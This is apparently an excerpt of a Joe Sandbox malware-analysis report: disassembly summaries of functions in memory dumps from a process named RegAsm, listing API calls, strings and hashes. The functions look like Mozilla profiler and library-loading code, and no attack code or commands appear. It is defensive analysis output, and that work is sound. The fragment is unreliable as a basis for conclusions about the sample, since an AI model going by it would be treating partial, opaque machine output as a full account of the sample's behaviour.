                                                                              • Part of subcall function 6CC799A0: ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC799F8
                                                                            Strings
                                                                            • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6CC7E13F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                            • API String ID: 2491745604-3904374701
                                                                            • Opcode ID: 3d582ef41a8d17a1c25dbab890a67450393b63b968459fa1d7bb173b04860e59
                                                                            • Instruction ID: 9b5a9714f861609d0d22e8c0589c4fcfccc6c16457f8571a6d1f25ae1413cdb6
                                                                            • Opcode Fuzzy Hash: 3d582ef41a8d17a1c25dbab890a67450393b63b968459fa1d7bb173b04860e59
                                                                            • Instruction Fuzzy Hash: 3831F6B16047019FD7049FA884553AAF7E5EFC6348F14C42EE8598BB41FB708909C7A2
                                                                            APIs
                                                                            • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CC6F480
                                                                              • Part of subcall function 6CC3F100: LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                              • Part of subcall function 6CC3F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                            • CloseHandle.KERNEL32(00000000), ref: 6CC6F555
                                                                              • Part of subcall function 6CC414B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CC41248,6CC41248,?), ref: 6CC414C9
                                                                              • Part of subcall function 6CC414B0: memcpy.VCRUNTIME140(?,6CC41248,00000000,?,6CC41248,?), ref: 6CC414EF
                                                                              • Part of subcall function 6CC3EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CC3EEE3
                                                                            • CreateFileW.KERNEL32 ref: 6CC6F4FD
                                                                            • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CC6F523
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                            • String ID: \oleacc.dll
                                                                            • API String ID: 2595878907-3839883404
                                                                            • Opcode ID: 8db3ade2e76c7dc684c618afdf0cd0c96942311eb06c539bcc35637ec44ddafe
                                                                            • Instruction ID: bf251850898c74005623de6b00750e3827e99eb0af08c6eede5676e93464d8a8
                                                                            • Opcode Fuzzy Hash: 8db3ade2e76c7dc684c618afdf0cd0c96942311eb06c539bcc35637ec44ddafe
                                                                            • Instruction Fuzzy Hash: 4D41AE306087509FE720DF6AD984B9AB7F4AF44318F504A1CF59483A50FB30D9498BA2
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC70222
                                                                            • moz_xmalloc.MOZGLUE(0000000C), ref: 6CC70231
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC7028B
                                                                            • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6CC702F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
                                                                            • String ID: @
                                                                            • API String ID: 2782572024-2766056989
                                                                            • Opcode ID: 45710384878d39979fdc52a64af5d7ac0d1aa5e4d5096c9c2ab3d3076eba2169
                                                                            • Instruction ID: d438f2e1e138f83d23b1953e8fb043d95264a886524b7df945bf14d2706c3efe
                                                                            • Opcode Fuzzy Hash: 45710384878d39979fdc52a64af5d7ac0d1aa5e4d5096c9c2ab3d3076eba2169
                                                                            • Instruction Fuzzy Hash: 5831AEB2B006518FEB64CF59C880A1AB7F2FF44314B14852DD95ADBB81E772EC01CBA1
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E047
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7E04F
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E09C
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E0B0
                                                                            Strings
                                                                            • [I %d/%d] profiler_get_profile, xrefs: 6CC7E057
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [I %d/%d] profiler_get_profile
                                                                            • API String ID: 1832963901-4276087706
                                                                            • Opcode ID: 58b5ac3eae2e30694661e5a8e7a6306bf5a6c5b3be46caf3ccc8d26de38ca540
                                                                            • Instruction ID: 4cc4da9b46a90729d47ce00b5c7ea4e919039f75f84e0613efacdd09bfa4aab1
                                                                            • Opcode Fuzzy Hash: 58b5ac3eae2e30694661e5a8e7a6306bf5a6c5b3be46caf3ccc8d26de38ca540
                                                                            • Instruction Fuzzy Hash: F421C275B001088FDF10DFA4D85CAEEB7B5EF45208F144029E90A97741EB31A90AC7F1
                                                                            APIs
                                                                            • SetLastError.KERNEL32(00000000), ref: 6CC97526
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC97566
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC97597
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer$ErrorLast
                                                                            • String ID: UnmapViewOfFile2$kernel32.dll
                                                                            • API String ID: 3217676052-1401603581
                                                                            • Opcode ID: 5732aacc14c51ebfd25fcc35d4a704cd0e2e80190042ab8bc60d20784d5fac73
                                                                            • Instruction ID: bcaae2a58e4037b62c7f0040e3b9ac632e3111d96814dac22b187094dc224c5d
                                                                            • Opcode Fuzzy Hash: 5732aacc14c51ebfd25fcc35d4a704cd0e2e80190042ab8bc60d20784d5fac73
                                                                            • Instruction Fuzzy Hash: 0D210739702501AFCA148FEAC854E9A3375EB87728F1445A8E405A7F40FB31A8428B99
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBF770,-00000001,?,6CCAE330,?,6CC5BDF7), ref: 6CC9A7AF
                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6CC5BDF7), ref: 6CC9A7C2
                                                                            • moz_xmalloc.MOZGLUE(00000018,?,6CC5BDF7), ref: 6CC9A7E4
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A80A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                            • String ID: accelerator.dll
                                                                            • API String ID: 2442272132-2426294810
                                                                            • Opcode ID: 278045426007937eac2b31c12e477f06b2d5e7015ad246891c16642f0c2d893b
                                                                            • Instruction ID: 35150c22d8cf806bb711a509f456227c69f05d7e3148b6fe928cb720fcb5e5f9
                                                                            • Opcode Fuzzy Hash: 278045426007937eac2b31c12e477f06b2d5e7015ad246891c16642f0c2d893b
                                                                            • Instruction Fuzzy Hash: 7D01A2786003049FDB04CFDAD8C9D5577F8FF8931470480AAE8099B751EB70A800CBA0
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ole32,?,6CC3EE51,?), ref: 6CC3F0B2
                                                                            • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6CC3F0C2
                                                                            Strings
                                                                            • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6CC3F0DC
                                                                            • ole32, xrefs: 6CC3F0AD
                                                                            • Could not find CoTaskMemFree, xrefs: 6CC3F0E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                            • API String ID: 2574300362-1578401391
                                                                            • Opcode ID: 41826c5b977149d6489d6105696a1c712016a9be2c042c93e12641924b234564
                                                                            • Instruction ID: e8e21632cc7565b75f804de515cb8be09199a1895e5bb69d036ee744cc87cbcf
                                                                            • Opcode Fuzzy Hash: 41826c5b977149d6489d6105696a1c712016a9be2c042c93e12641924b234564
                                                                            • Instruction Fuzzy Hash: A7E0D8B47446029F9F041AFEA858A2637BC6B121093005829F906E1F10FA34D4018626
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47235), ref: 6CC700D8
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6CC700F7
                                                                            • FreeLibrary.KERNEL32(?,6CC47235), ref: 6CC7010E
                                                                            Strings
                                                                            • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6CC700F1
                                                                            • wintrust.dll, xrefs: 6CC700D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                            • API String ID: 145871493-2559046807
                                                                            • Opcode ID: eac06c0a08ef49c4804ec8c792a34dd699696796f47c5b2840101911fece71cb
                                                                            • Instruction ID: d8a69529154ecd6d3b4706dc8602c4e06d9a4f8a0524c8609cc9cbf440ee710a
                                                                            • Opcode Fuzzy Hash: eac06c0a08ef49c4804ec8c792a34dd699696796f47c5b2840101911fece71cb
                                                                            • Instruction Fuzzy Hash: 96E0467C7453869FEF109FE5C9497223AF8E707244F109025A90EC1B50EBB2C000DB28
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47204), ref: 6CC70088
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6CC700A7
                                                                            • FreeLibrary.KERNEL32(?,6CC47204), ref: 6CC700BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                            • API String ID: 145871493-3385133079
                                                                            • Opcode ID: 2629ab1c8b645b495e8f9e6138e926cfa5fee034f7433bc796ee29314912e33d
                                                                            • Instruction ID: 36010a133204443830826247e9e8a93c4db88e3cd2d05fee2d32fc5c3da5c18e
                                                                            • Opcode Fuzzy Hash: 2629ab1c8b645b495e8f9e6138e926cfa5fee034f7433bc796ee29314912e33d
                                                                            • Instruction Fuzzy Hash: F4E0927C6443859FEF20AFFAD8587027AF8AB1B355F10401AA915D2760EBB6C4009B2A
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47266), ref: 6CC701C8
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6CC701E7
                                                                            • FreeLibrary.KERNEL32(?,6CC47266), ref: 6CC701FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminReleaseContext$wintrust.dll
                                                                            • API String ID: 145871493-1489773717
                                                                            • Opcode ID: 459fb640ea98efd967dc6177afb98ff0ac7e5195dc288a9eb85922e8790f1ff8
                                                                            • Instruction ID: 6c813ce744cfe635db1875e1d0f3fc86617c0e96149d89f530fa0445e30a4906
                                                                            • Opcode Fuzzy Hash: 459fb640ea98efd967dc6177afb98ff0ac7e5195dc288a9eb85922e8790f1ff8
                                                                            • Instruction Fuzzy Hash: 64E09A7C6853859FEF109FEAD8587027BF8EB07345F104419E905D5750EBB294009B29
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47308), ref: 6CC70178
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6CC70197
                                                                            • FreeLibrary.KERNEL32(?,6CC47308), ref: 6CC701AE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                            • API String ID: 145871493-3354427110
                                                                            • Opcode ID: 2c10eea644964ad41764629312dd97f716fffab30680da5ba03cbe5ad45da9c0
                                                                            • Instruction ID: 1e164a6c63df0a79473e0ed516c8980176ddbd5d85c38187c7d0427882f9e1a7
                                                                            • Opcode Fuzzy Hash: 2c10eea644964ad41764629312dd97f716fffab30680da5ba03cbe5ad45da9c0
                                                                            • Instruction Fuzzy Hash: 8CE04FBC6813419FEF105FE5D969B013BF8F707345F100056E986C1790E7B28040CB28
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47297), ref: 6CC70128
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6CC70147
                                                                            • FreeLibrary.KERNEL32(?,6CC47297), ref: 6CC7015E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                            • API String ID: 145871493-1536241729
                                                                            • Opcode ID: 3bb22ac3be42e3246bda19ba6a3b5ea62f9b55676c3b2f5ec7ab2f0b129004e3
                                                                            • Instruction ID: acfabc2c0379f4a697979956ffc150894891bb0f9f11a9cfd44413091fb449c6
                                                                            • Opcode Fuzzy Hash: 3bb22ac3be42e3246bda19ba6a3b5ea62f9b55676c3b2f5ec7ab2f0b129004e3
                                                                            • Instruction Fuzzy Hash: 0FE0927C6453859FEF106FEAD8587167AF8F707345F104015AA06D6B60EBB3C400CB69
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC9C0E9), ref: 6CC9C418
                                                                            • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CC9C437
                                                                            • FreeLibrary.KERNEL32(?,6CC9C0E9), ref: 6CC9C44C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                            • API String ID: 145871493-2623246514
                                                                            • Opcode ID: ecf190e8655b9f2272bc3c3554aae5bea1a44b9d5c7d13f755fb78c8d2b28e7e
                                                                            • Instruction ID: 3891445e8c9b70eaa66cb6624ab46c56df29eb743415b65ae7d71ea7b268d550
                                                                            • Opcode Fuzzy Hash: ecf190e8655b9f2272bc3c3554aae5bea1a44b9d5c7d13f755fb78c8d2b28e7e
                                                                            • Instruction Fuzzy Hash: AAE0927C6053419FDB006FF5C9587127AF8A717304F004116AA0991B60EBB2C4018B58
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC9748B,?), ref: 6CC975B8
                                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CC975D7
                                                                            • FreeLibrary.KERNEL32(?,6CC9748B,?), ref: 6CC975EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                            • API String ID: 145871493-3641475894
                                                                            • Opcode ID: d3d649e1be201a315bd4cbde7794e23b7e6f9418d119ee6a395d70f57391d10e
                                                                            • Instruction ID: 348c6c644ae85138cc4783dc4b3a9e6899b23022aa0d8daaea1c2cbca9274b5b
                                                                            • Opcode Fuzzy Hash: d3d649e1be201a315bd4cbde7794e23b7e6f9418d119ee6a395d70f57391d10e
                                                                            • Instruction Fuzzy Hash: 78E0B6BD605342AFEF006FE2C8987037AF8EB06218F1040A5B905F1750EBF08492CF18
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC97592), ref: 6CC97608
                                                                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CC97627
                                                                            • FreeLibrary.KERNEL32(?,6CC97592), ref: 6CC9763C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                            • API String ID: 145871493-1050664331
                                                                            • Opcode ID: 2c89db1f35db4f091a63ad2647cb40e3740ec44f9e49b4c19eedbc4ab9510053
                                                                            • Instruction ID: f09001c65f94cf9f0539091b7df4eacd722370439b093256ad51bde58d0dcde6
                                                                            • Opcode Fuzzy Hash: 2c89db1f35db4f091a63ad2647cb40e3740ec44f9e49b4c19eedbc4ab9510053
                                                                            • Instruction Fuzzy Hash: 8AE092BC605381AFDF006FEA889C7027AB8EB1B259F004195E905E1750EBB084118B1C
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC9C1DE,?,00000000,?,00000000,?,6CC4779F), ref: 6CC9C1F8
                                                                            • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6CC9C217
                                                                            • FreeLibrary.KERNEL32(?,6CC9C1DE,?,00000000,?,00000000,?,6CC4779F), ref: 6CC9C22C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: WinVerifyTrust$wintrust.dll
                                                                            • API String ID: 145871493-2991032369
                                                                            • Opcode ID: 944add89c3aaa2ed1a81b62d78922f782d7e43046e41ef106c66fc6fab4a38d9
                                                                            • Instruction ID: c0d634407497902ba80a9551aff08cc22458bd3bf3b3ebcada0a83bbaaa9899e
                                                                            • Opcode Fuzzy Hash: 944add89c3aaa2ed1a81b62d78922f782d7e43046e41ef106c66fc6fab4a38d9
                                                                            • Instruction Fuzzy Hash: C6E0B67C2053959FDF007FE5C958B027FF8AB07304F000519A905D1B51E7B284008B69
                                                                            APIs
